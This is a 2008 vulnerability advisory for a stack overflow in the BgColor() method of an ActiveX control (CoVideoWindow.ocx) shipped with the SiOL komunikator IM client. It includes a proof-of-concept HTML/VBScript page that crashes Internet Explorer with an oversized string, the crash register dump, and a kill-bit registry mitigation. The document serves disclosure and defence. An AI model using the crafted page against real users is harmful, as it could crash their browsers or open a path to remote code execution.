========================================================================= SiOL komunikator IM ActiveX stack overflow condition ========================================================================= Release date: 30.7.2008 Severity: Moderately critical Impact: Stack overflow Remote: Yes Status: Unpatched Software: SiOL Komunikator v1.3 (SLO_71130) Tested on: Microsoft Windows XP SP3 / IE6 SP3 Developer: http://www.siol.net/ http://www.eyeball.com/ Disclosed by: Edi Strosar Vendor's description of affected application: ============================================= "SiOL komunikator je programska oprema za neposredno sporo?anje, ki podpira celovito komuniciranje s tekstovnimi sporo?ili, izmenjavo datotek ter monostjo glasovnih in video klicev, brez telefonskega aparata in s katerekoli lokacije, kjer je omogo?ena povezava v Internet." English translation (sort of): SiOL komunikator is an instant messaging (IM) application based on Eyeball Communicator offered by SiOL (Slovenia On-Line) ISP. Download link: http://www.siol.net/spletne_storitve/siol_komunikator.aspx ActiveX control overview: ========================= Developer: Eyeball Networks, Inc. Version: 5.0.907.1 Component: CoVideoWindow.ocx GUID: {CA06EE71-7348-44C4-9540-AAF0E6BD1515} RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True KillBitSet: False Description: ============ SiOL komunikator's ActiveX component CoVideoWindow.ocx is susceptible to stack overflow condition in BgColor() method which may lead to remote code execution. The vulnerability could be exploited if user with SiOL komunikator installed visits a specialy crafted web page. Proof of concept: ================= Following testcase will crash Internet Explorer: <html> <object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object> <input language=VBScript onclick=buffero() type=button value="Crash"> <script language = 'vbscript'> Sub buffero() crash = String(515000, unescape("%41")) test.BgColor = crash End Sub </script> </html> Note: close all Internet Explorer instances before executing PoC! Tested with SiOL komunikator v1.3 (SLO_71130). Other versions may be affected. Exception overview: =================== ---------------------------------------------------------------- Exception C00000FD (STACK_OVERFLOW) ---------------------------------------------------------------- EAX=00000774: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EBX=00000003: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ECX=000428F4: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 EDX=000FB770: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ESP=0013D8EC: C6 9A 80 7C 0D B9 E8 01-00 00 00 00 20 39 EC 01 EBP=0013D904: 44 D9 13 00 1C 9F E8 01-1C D9 13 00 24 00 39 02 ESI=000FB772: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 EDI=02390024: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 EIP=01E93635: 85 01 3D 00 10 00 00 73-EC 2B C8 8B C4 85 01 8B --> TEST [ECX],EAX ---------------------------------------------------------------- Mitigation: =========== Set the kill bit (http://support.microsoft.com/kb/240797). Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension. Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CA06EE71-7348-44c4-9540-AAF0E6BD1515}] "Compatibility Flags"=dword:00000400 Timeline: ========= 12.07.2008 - initial developer notification - no response 20.07.2008 - additional developer notification - no response 30.07.2008 - public disclosure Contact: ======== edi [dot] strosar [at] gmail [dot] com Disclaimer: =========== The content of this report is purely informational and meant for educational purposes only. Author shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk. =========================================================================